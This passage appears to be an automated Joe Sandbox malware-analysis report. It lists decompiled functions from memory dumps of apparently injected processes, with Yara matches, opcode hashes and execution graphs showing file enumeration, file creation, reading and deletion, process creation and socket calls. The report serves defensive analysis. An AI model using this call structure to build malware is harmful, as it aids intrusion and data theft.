                                                                    Function 03639126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                                                    • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4
                                                                    Function 036BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 036BCFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @$@4rw@4rw
                                                                    • API String ID: 4062629308-2979693914
                                                                    • Opcode ID: 80008630b15025f6f5ca4ce0509ec1ece12d6dc72d456d752687f0c2f4b0879e
                                                                    • Instruction ID: 1734f907ab674a2e86636b25b80b10e9085d242087ad081629f770de34f2bfa0
                                                                    • Opcode Fuzzy Hash: 80008630b15025f6f5ca4ce0509ec1ece12d6dc72d456d752687f0c2f4b0879e
                                                                    • Instruction Fuzzy Hash: AF419C79A00224DFDB21EFA9C980AAEBBB8EF45B04F14406EEA15DF354D734D941CB64

                                                                    Execution Graph

                                                                    Execution Coverage:2.4%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:3
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 12149 9188a0c 12150 9188a29 12149->12150 12151 9188a38 closesocket 12150->12151

                                                                    Executed Functions

                                                                    Function 09188A0C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 9188a0c-9188a46 call 916039c call 91895ec closesocket
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocket
                                                                    • String ID:
                                                                    • API String ID: 2781271927-0
                                                                    • Opcode ID: 2bee16b7ae48288ce2e2f7aace2b0738cf5cb9468384aa48a2f37f65ec06809b
                                                                    • Instruction ID: 77afd72c9c3392aae325d7faf41fa2270250422ce27a17fd8886be1e2493f6c2
                                                                    • Opcode Fuzzy Hash: 2bee16b7ae48288ce2e2f7aace2b0738cf5cb9468384aa48a2f37f65ec06809b
                                                                    • Instruction Fuzzy Hash: C7E08C32200204BBD610FA5ACC00DEBBB6CDFC9310B01841AFA08A7201C671B925CBF0

                                                                    Non-executed Functions

                                                                    Function 09168AAC Relevance: 40.5, Strings: 32, Instructions: 505COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #D$)Y$<T$<Y$?'$?A$?Q$D$I\$N}$T^$Vs$X*$X5$]?$^X$b$cR$d9$j$}T$+$5$<$B$R$U$Y$e$e$g$s
                                                                    • API String ID: 0-3969691307
                                                                    • Opcode ID: d2ca22a7440ea7b9261f05e6bbb2a9af59a4c8b489afed5b03ba5b6209312085
                                                                    • Instruction ID: d50c9b35379205bbb40828648d8c4eb7f45158b805d462d0d0affbf63fba5378
                                                                    • Opcode Fuzzy Hash: d2ca22a7440ea7b9261f05e6bbb2a9af59a4c8b489afed5b03ba5b6209312085
                                                                    • Instruction Fuzzy Hash: BF52A1B0E0526ACBEB28CF04C994BEDBBB2BB45308F1080D9D50D6B690D7B55AD9DF44
                                                                    Function 091655C5 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d631db1fe2f709c1efda2c22692eed9dcd3aec46ed1c536959378932a721876
                                                                    • Instruction ID: 12aa168e8ebfc7d43ea4c0fd7870c8602970f6f60f7eb5ae66df915796ce8365
                                                                    • Opcode Fuzzy Hash: 8d631db1fe2f709c1efda2c22692eed9dcd3aec46ed1c536959378932a721876
                                                                    • Instruction Fuzzy Hash: 70C02B03F4102C0051200D5D74400F2F324E2C36B1F4032F3CD58B710048A3CC0241DC
                                                                    Function 09162FAC Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e71a009ad75cae11130ec5c60c7a5743d992782276b151aeda36eeaed9c85ca4
                                                                    • Instruction ID: a0a112b559aec51373933cf3f8d59f5c9c7855229de75bba884722114b23c266
                                                                    • Opcode Fuzzy Hash: e71a009ad75cae11130ec5c60c7a5743d992782276b151aeda36eeaed9c85ca4
                                                                    • Instruction Fuzzy Hash: C0B092ADE0A4862A51110CA02C259F7FB6C8583021A0173856AAC37AA00912802225A9

                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:1.7%
                                                                    Total number of Nodes:409
                                                                    Total number of Limit Nodes:64
                                                                    execution_graph 81682 7e9bb0 81685 7e9f3a 81682->81685 81684 7ea534 81685->81684 81686 80b110 81685->81686 81687 80b136 81686->81687 81692 7e41d0 81687->81692 81689 80b142 81691 80b17b 81689->81691 81695 805660 81689->81695 81691->81684 81699 7f3340 81692->81699 81694 7e41dd 81694->81689 81696 8056c2 81695->81696 81698 8056cf 81696->81698 81751 7f1b50 81696->81751 81698->81691 81701 7f3357 81699->81701 81700 7f3370 81700->81694 81701->81700 81706 809e60 81701->81706 81703 7f33cb 81703->81700 81713 805dc0 81703->81713 81705 7f3419 81705->81694 81708 809e7a 81706->81708 81707 809ea9 81707->81703 81708->81707 81718 808a20 81708->81718 81714 805e25 81713->81714 81715 805e50 81714->81715 81731 7f2fe0 81714->81731 81715->81705 81717 805e32 81717->81705 81719 808a3a 81718->81719 81725 4a62c0a 81719->81725 81720 808a66 81722 80b4a0 81720->81722 81728 809770 81722->81728 81724 809f1c 81724->81703 81726 4a62c11 81725->81726 81727 4a62c1f LdrInitializeThunk 81725->81727 81726->81720 81727->81720 81729 80978a 81728->81729 81730 80979b RtlFreeHeap 81729->81730 81730->81724 81732 7f2ff4 81731->81732 81736 7f2fc7 81732->81736 81737 7f7e70 81732->81737 81736->81717 81738 7f7e8a 81737->81738 81742 7f325c 81737->81742 81746 808ac0 81738->81746 81741 8093f0 NtClose 81741->81742 81742->81736 81743 8093f0 81742->81743 81744 80940a 81743->81744 81745 80941b NtClose 81744->81745 81745->81736 81747 808add 81746->81747 81750 4a635c0 LdrInitializeThunk 81747->81750 81748 7f7f5a 81748->81741 81750->81748 81752 7f1b8b 81751->81752 81769 7f7f80 81752->81769 81754 7f1b93 81768 7f1e60 81754->81768 81780 80b580 81754->81780 81756 7f1ba9 81757 80b580 RtlAllocateHeap 81756->81757 81758 7f1bb7 81757->81758 81759 80b580 RtlAllocateHeap 81758->81759 81760 7f1bc8 81759->81760 81762 7f1c5c 81760->81762 81791 7f6b20 NtClose LdrInitializeThunk LdrInitializeThunk 81760->81791 81783 7f4680 81762->81783 81764 7f1e0f 81765 7f1e3b WSAStartup 81764->81765 81766 7f1e49 81764->81766 81765->81766 81787 807fa0 81766->81787 81768->81698 81770 7f7fac 81769->81770 81771 7f7e70 2 API calls 81770->81771 81772 7f7fcf 81771->81772 81773 7f7fd9 81772->81773 81776 7f7ff1 81772->81776 81774 7f7fe4 81773->81774 81777 8093f0 NtClose 81773->81777 81774->81754 81775 7f800d 81775->81754 81776->81775 81778 8093f0 NtClose 81776->81778 81777->81774 81779 7f8003 81778->81779 81779->81754 81792 809720 81780->81792 81782 80b59b 81782->81756 81784 7f46a4 81783->81784 81785 7f46ab 81784->81785 81786 7f46e0 LdrLoadDll 81784->81786 81785->81764 81786->81785 81788 808002 81787->81788 81790 80800f 81788->81790 81795 7f1e70 81788->81795 81790->81768 81791->81762 81793 80973a 81792->81793 81794 80974b RtlAllocateHeap 81793->81794 81794->81782 81809 7f8250 81795->81809 81798 7f20a4 81818 80c790 81798->81818 81799 7f1e90 81802 7f23d7 81799->81802 81813 80c660 81799->81813 81802->81790 81803 7f20b9 81805 7f2106 81803->81805 81824 7f09c0 81803->81824 81805->81802 81807 7f09c0 LdrInitializeThunk 81805->81807 81828 7f81f0 81805->81828 81806 7f81f0 LdrInitializeThunk 81808 7f2257 81806->81808 81807->81805 81808->81805 81808->81806 81810 7f825d 81809->81810 81811 7f827c SetErrorMode 81810->81811 81812 7f8283 81810->81812 81811->81812 81812->81799 81814 80c670 81813->81814 81815 80c676 81813->81815 81814->81798 81816 80b580 RtlAllocateHeap 81815->81816 81817 80c69c 81816->81817 81817->81798 81819 80c700 81818->81819 81820 80c75d 81819->81820 81821 80b580 RtlAllocateHeap 81819->81821 81820->81803 81822 80c73a 81821->81822 81823 80b4a0 RtlFreeHeap 81822->81823 81823->81820 81825 7f09d9 81824->81825 81832 809680 81825->81832 81829 7f8203 81828->81829 81837 808920 81829->81837 81831 7f822e 81831->81805 81833 80969a 81832->81833 81836 4a62c70 LdrInitializeThunk 81833->81836 81834 7f09df 81834->81808 81836->81834 81838 80899e 81837->81838 81840 80894e 81837->81840 81842 4a62dd0 LdrInitializeThunk 81838->81842 81839 8089c3 81839->81831 81840->81831 81842->81839 81843 7f23f0 81844 7f2406 81843->81844 81845 808a20 LdrInitializeThunk 81844->81845 81846 7f2426 81845->81846 81847 8060d0 81848 80612a 81847->81848 81850 806137 81848->81850 81851 803b10 81848->81851 81853 803b51 81851->81853 81852 803c50 81852->81850 81853->81852 81854 7f4680 LdrLoadDll 81853->81854 81856 803b91 81854->81856 81855 803bd2 Sleep 81855->81856 81856->81852 81856->81855 81857 808850 81858 8088dc 81857->81858 81860 80887b 81857->81860 81862 4a62ee0 LdrInitializeThunk 81858->81862 81859 80890d 81862->81859 81868 8017d0 81869 8017ec 81868->81869 81870 801814 81869->81870 81871 801828 81869->81871 81872 8093f0 NtClose 81870->81872 81873 8093f0 NtClose 81871->81873 81874 80181d 81872->81874 81875 801831 81873->81875 81878 80b5c0 RtlAllocateHeap 81875->81878 81877 80183c 81878->81877 81879 809350 81880 8093c7 81879->81880 81882 80937e 81879->81882 81881 8093dd NtDeleteFile 81880->81881 81883 7fae20 81888 7fab30 81883->81888 81885 7fae2d 81902 7fa7b0 81885->81902 81887 7fae43 81889 7fab55 81888->81889 81913 7f8450 81889->81913 81892 7faca3 81892->81885 81894 7facba 81894->81885 81895 7facb1 81895->81894 81897 7fada7 81895->81897 81932 7fa200 81895->81932 81898 7fae0a 81897->81898 81941 7fa570 81897->81941 81900 80b4a0 RtlFreeHeap 81898->81900 81901 7fae11 81900->81901 81901->81885 81903 7fa7c3 81902->81903 81910 7fa7ce 81902->81910 81904 80b580 RtlAllocateHeap 81903->81904 81904->81910 81905 7fa7ec 81905->81887 81906 7f8450 GetFileAttributesW 81906->81910 81907 7fab02 81908 7fab18 81907->81908 81909 80b4a0 RtlFreeHeap 81907->81909 81908->81887 81909->81908 81910->81905 81910->81906 81910->81907 81911 7fa200 RtlFreeHeap 81910->81911 81912 7fa570 RtlFreeHeap 81910->81912 81911->81910 81912->81910 81914 7f846f 81913->81914 81915 7f8476 GetFileAttributesW 81914->81915 81916 7f8481 81914->81916 81915->81916 81916->81892 81917 8033f0 81916->81917 81918 8033fe 81917->81918 81919 803405 81917->81919 81918->81895 81920 7f4680 LdrLoadDll 81919->81920 81921 803437 81920->81921 81922 803446 81921->81922 81945 802ec0 LdrLoadDll 81921->81945 81923 80b580 RtlAllocateHeap 81922->81923 81928 8035f1 81922->81928 81925 80345f 81923->81925 81926 8035e7 81925->81926 81925->81928 81929 80347b 81925->81929 81927 80b4a0 RtlFreeHeap 81926->81927 81926->81928 81927->81928 81928->81895 81929->81928 81930 80b4a0 RtlFreeHeap 81929->81930 81931 8035db 81930->81931 81931->81895 81933 7fa226 81932->81933 81946 7fdc00 81933->81946 81935 7fa298 81936 7fa41a 81935->81936 81937 7fa2b6 81935->81937 81938 7fa3ff 81936->81938 81939 7fa0c0 RtlFreeHeap 81936->81939 81937->81938 81951 7fa0c0 81937->81951 81938->81895 81939->81936 81942 7fa596 81941->81942 81943 7fdc00 RtlFreeHeap 81942->81943 81944 7fa61d 81943->81944 81944->81897 81945->81922 81947 7fdc24 81946->81947 81948 7fdc31 81947->81948 81949 80b4a0 RtlFreeHeap 81947->81949 81948->81935 81950 7fdc74 81949->81950 81950->81935 81952 7fa0dd 81951->81952 81955 7fdc90 81952->81955 81954 7fa1e3 81954->81937 81956 7fdcb4 81955->81956 81957 7fdd5e 81956->81957 81958 80b4a0 RtlFreeHeap 81956->81958 81957->81954 81958->81957 81959 7ff8a0 81960 7ff904 81959->81960 81984 7f63c0 81960->81984 81962 7ffa3e 81963 7ffa37 81963->81962 81991 7f64d0 81963->81991 81965 7ffaba 81966 7ffbf2 81965->81966 81983 7ffbe3 81965->81983 81995 7ff690 81965->81995 81967 8093f0 NtClose 81966->81967 81969 7ffbfc 81967->81969 81970 7ffaf6 81970->81966 81971 7ffb01 81970->81971 81972 80b580 RtlAllocateHeap 81971->81972 81973 7ffb2a 81972->81973 81974 7ffb49 81973->81974 81975 7ffb33 81973->81975 82004 7ff580 CoInitialize 81974->82004 81977 8093f0 NtClose 81975->81977 81978 7ffb3d 81977->81978 81979 7ffb57 81980 8093f0 NtClose 81979->81980 81981 7ffbdc 81980->81981 81982 80b4a0 RtlFreeHeap 81981->81982 81982->81983 81985 7f63f3 81984->81985 81986 7f6414 81985->81986 82007 808f50 81985->82007 81986->81963 81988 7f6437 81988->81986 81989 8093f0 NtClose 81988->81989 81990 7f64b9 81989->81990 81990->81963 81992 7f64f5 81991->81992 82012 808d40 81992->82012 81996 7ff6ac 81995->81996 81997 7f4680 LdrLoadDll 81996->81997 81999 7ff6c7 81997->81999 81998 7ff6d0 81998->81970 81999->81998 82000 7f4680 LdrLoadDll 81999->82000 82001 7ff79b 82000->82001 82002 7f4680 LdrLoadDll 82001->82002 82003 7ff7f5 82001->82003 82002->82003 82003->81970 82006 7ff5e5 82004->82006 82005 7ff67b CoUninitialize 82005->81979 82006->82005 82008 808f6d 82007->82008 82011 4a62ca0 LdrInitializeThunk 82008->82011 82009 808f99 82009->81988 82011->82009 82013 808d5a 82012->82013 82016 4a62c60 LdrInitializeThunk 82013->82016 82014 7f6569 82014->81965 82016->82014 82017 809260 82018 809304 82017->82018 82020 80928b 82017->82020 82019 80931a NtReadFile 82018->82019 82021 8001a0 82022 8001bd 82021->82022 82023 7f4680 LdrLoadDll 82022->82023 82024 8001d8 82023->82024 82025 7f7498 82026 7f7435 82025->82026 82030 7f743b 82025->82030 82027 7f747f 82026->82027 82026->82030 82028 7f748f 82027->82028 82032 7fb330 82027->82032 82030->82028 82031 7fb330 9 API calls 82030->82031 82031->82028 82033 7fb356 82032->82033 82034 7fb57d 82033->82034 82059 809800 82033->82059 82034->82028 82036 7fb3c9 82036->82034 82037 80c790 2 API calls 82036->82037 82038 7fb3e8 82037->82038 82038->82034 82039 7fb4b9 82038->82039 82040 808a20 LdrInitializeThunk 82038->82040 82041 7f5c40 LdrInitializeThunk 82039->82041 82043 7fb4d5 82039->82043 82042 7fb44a 82040->82042 82041->82043 82042->82039 82045 7fb453 82042->82045 82047 7fb565 82043->82047 82065 808590 82043->82065 82044 7fb4a1 82048 7f81f0 LdrInitializeThunk 82044->82048 82045->82034 82045->82044 82046 7fb47f 82045->82046 82062 7f5c40 82045->82062 82080 8047f0 LdrInitializeThunk 82046->82080 82053 7f81f0 LdrInitializeThunk 82047->82053 82052 7fb4af 82048->82052 82052->82028 82054 7fb573 82053->82054 82054->82028 82055 7fb53c 82070 808640 82055->82070 82057 7fb556 82075 8087a0 82057->82075 82060 80981a 82059->82060 82061 809828 CreateProcessInternalW 82060->82061 82061->82036 82081 808bf0 82062->82081 82064 7f5c7e 82064->82046 82066 80860a 82065->82066 82068 8085bb 82065->82068 82087 4a639b0 LdrInitializeThunk 82066->82087 82067 80862f 82067->82055 82068->82055 82071 8086ba 82070->82071 82073 80866b 82070->82073 82088 4a64340 LdrInitializeThunk 82071->82088 82072 8086df 82072->82057 82073->82057 82076 80881d 82075->82076 82078 8087ce 82075->82078 82089 4a62fb0 LdrInitializeThunk 82076->82089 82077 808842 82077->82047 82078->82047 82080->82044 82082 808c9d 82081->82082 82083 808c1e 82081->82083 82086 4a62d10 LdrInitializeThunk 82082->82086 82083->82064 82084 808ce2 82084->82064 82086->82084 82087->82067 82088->82072 82089->82077 82090 7e9b50 82091 7e9b5f 82090->82091 82092 7e9b9d 82091->82092 82093 7e9b8a CreateThread 82091->82093 82094 7f7250 82095 7f726c 82094->82095 82102 7f72bc 82094->82102 82097 8093f0 NtClose 82095->82097 82095->82102 82096 7f73e9 82098 7f7287 82097->82098 82104 7f6650 NtClose LdrInitializeThunk 82098->82104 82100 7f73cb 82100->82096 82106 7f6820 NtClose LdrInitializeThunk LdrInitializeThunk 82100->82106 82102->82096 82105 7f6650 NtClose LdrInitializeThunk 82102->82105 82104->82102 82105->82100 82106->82096 82107 7fc690 82109 7fc6b9 82107->82109 82108 7fc7bc 82109->82108 82110 7fc760 FindFirstFileW 82109->82110 82110->82108 82112 7fc77b 82110->82112 82111 7fc7a3 FindNextFileW 82111->82112 82113 7fc7b5 FindClose 82111->82113 82112->82111 82113->82108 82114 8090f0 82115 8091a4 82114->82115 82117 80911f 82114->82117 82116 8091ba NtCreateFile 82115->82116 82123 801b70 82126 801b89 82123->82126 82124 801c1c 82125 801bd4 82127 80b4a0 RtlFreeHeap 82125->82127 82126->82124 82126->82125 82129 801c17 82126->82129 82128 801be4 82127->82128 82130 80b4a0 RtlFreeHeap 82129->82130 82130->82124 82131 7f9d0b 82132 7f9d10 82131->82132 82133 80b4a0 RtlFreeHeap 82132->82133 82134 7f9d39 82132->82134 82133->82134 82135 4a62ad0 LdrInitializeThunk 82136 7f0f88 82137 7f0f9c 82136->82137 82138 7f0f90 PostThreadMessageW 82136->82138 82138->82137 82139 7f28c5 82140 7f28e5 82139->82140 82141 7f63c0 2 API calls 82140->82141 82142 7f28f0 82141->82142 82143 7f88c1 82144 7f88b1 82143->82144 82144->82143 82145 7f8921 82144->82145 82147 7f7090 LdrInitializeThunk LdrInitializeThunk 82144->82147 82147->82144 82148 7f5cc0 82149 7f81f0 LdrInitializeThunk 82148->82149 82150 7f5cf0 82149->82150 82152 7f5d1c 82150->82152 82153 7f8170 82150->82153 82154 7f81b4 82153->82154 82155 7f81d5 82154->82155 82160 8086f0 82154->82160 82155->82150 82157 7f81c5 82158 7f81e1 82157->82158 82159 8093f0 NtClose 82157->82159 82158->82150 82159->82155 82161 80871b 82160->82161 82162 80876a 82160->82162 82161->82157 82165 4a64650 LdrInitializeThunk 82162->82165 82163 80878f 82163->82157 82165->82163 82166 7f6e80 82167 7f6eaa 82166->82167 82170 7f8020 82167->82170 82169 7f6ed1 82171 7f803d 82170->82171 82177 808b10 82171->82177 82173 7f808d 82174 7f8094 82173->82174 82175 808bf0 LdrInitializeThunk 82173->82175 82174->82169 82176 7f80bd 82175->82176 82176->82169 82178 808bab 82177->82178 82180 808b3e 82177->82180 82182 4a62f30 LdrInitializeThunk 82178->82182 82179 808be4 82179->82173 82180->82173 82182->82179

                                                                    Executed Functions

                                                                    Function 007FC690 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 741 7fc690-7fc740 call 80b540 * 2 call 7e1410 call 801c90 call 7e1410 call 801c90 call 7e1410 call 801c90 758 7fc7bc-7fc7c4 741->758 759 7fc742-7fc744 741->759 759->758 760 7fc746-7fc74a 759->760 760->758 761 7fc74c-7fc74e 760->761 761->758 762 7fc750-7fc779 call 7fc4e0 FindFirstFileW 761->762 762->758 765 7fc77b-7fc77e 762->765 766 7fc780-7fc787 765->766 767 7fc789-7fc7a0 call 7fc580 766->767 768 7fc7a3-7fc7b3 FindNextFileW 766->768 767->768 768->766 770 7fc7b5-7fc7b9 FindClose 768->770 770->758
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 007FC771
                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 007FC7AE
                                                                    • FindClose.KERNELBASE(?), ref: 007FC7B9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: f44c58baf209bd75af3c66e409604e796a454ee48ac920048ae06e738891fe5c
                                                                    • Instruction ID: a5cb816075d082bc2d4f532bcd8f4b2cc8580b3b3c3918e339307838ffc3bec4
                                                                    • Opcode Fuzzy Hash: f44c58baf209bd75af3c66e409604e796a454ee48ac920048ae06e738891fe5c
                                                                    • Instruction Fuzzy Hash: 8231737590034CABDB21EB64CD89FFF777CEB84744F144459B608A72C1EB74AA848BA1
                                                                    Function 008090F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 008091EB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 926c2385d1fb51b2f42ca6124755c6da1f584dc89bb40cf5ca0adffc091a5ed4
                                                                    • Instruction ID: 05b9bf8fec3bc45833096b65b88458c3ba904e62d9670c768a88741e3cc1d7a1
                                                                    • Opcode Fuzzy Hash: 926c2385d1fb51b2f42ca6124755c6da1f584dc89bb40cf5ca0adffc091a5ed4
                                                                    • Instruction Fuzzy Hash: DE31E2B1A01248AFDB54DF98C881EEEB7F9EF8C304F108109F909A7380D774A941CBA5
                                                                    Function 00809260 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00809343
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: bd1ded572eae35531026b8e909257cfc8b5329edb6fb58b707e491301f0badd0
                                                                    • Instruction ID: a993dc1e0ecee3ee93437e576156ea6134641a056994b1ae6ee8dda65131b9b4
                                                                    • Opcode Fuzzy Hash: bd1ded572eae35531026b8e909257cfc8b5329edb6fb58b707e491301f0badd0
                                                                    • Instruction Fuzzy Hash: 8331E9B5A00248ABDB14DF99C881EDFB7B9EF88314F108119F908A7380D774A951CBA1
                                                                    Function 00809350 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: 2a74e573bf73c75d9e2f17c521f70068d114271476f4e5f21f1e9a3e66fb59b5
                                                                    • Instruction ID: d9060c1b1f5349520aeb30684ecfa32aa00519de0dc6ae987edd7eb42ce6a424
                                                                    • Opcode Fuzzy Hash: 2a74e573bf73c75d9e2f17c521f70068d114271476f4e5f21f1e9a3e66fb59b5
                                                                    • Instruction Fuzzy Hash: 3811A071500748BED720EB59CC42FEF77ACEF85714F104509FA08AB281EBB5A941CBA2
                                                                    Function 008093F0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: be3207122271e7a3f35108bc16ee7d5319e0d387d2d3b83b9a8a4fa6e62be9ee
                                                                    • Instruction ID: 087e11315aa81d11d05be2bc17b91cb797c9015bf857253f65b7a05275f5abaa
                                                                    • Opcode Fuzzy Hash: be3207122271e7a3f35108bc16ee7d5319e0d387d2d3b83b9a8a4fa6e62be9ee
                                                                    • Instruction Fuzzy Hash: F3E046362006147BC620AA5ACC06FDBB76CEFCA760F818415FA1CA7282C771B90086A1
                                                                    Function 04A635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cd1edd392348bdb497dc62b301d26ba7afca08ba7be2bb70a4e6172a9b4ac079
                                                                    • Instruction ID: 6cc7402c83fa1a3dfce3c273a06720ee3e88cee70f875222409c720342f88b8f
                                                                    • Opcode Fuzzy Hash: cd1edd392348bdb497dc62b301d26ba7afca08ba7be2bb70a4e6172a9b4ac079
                                                                    • Instruction Fuzzy Hash: B890023260550402F1107158491870620058BD0205FA6C425A0425568D8799DA5165A2
                                                                    Function 04A64650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
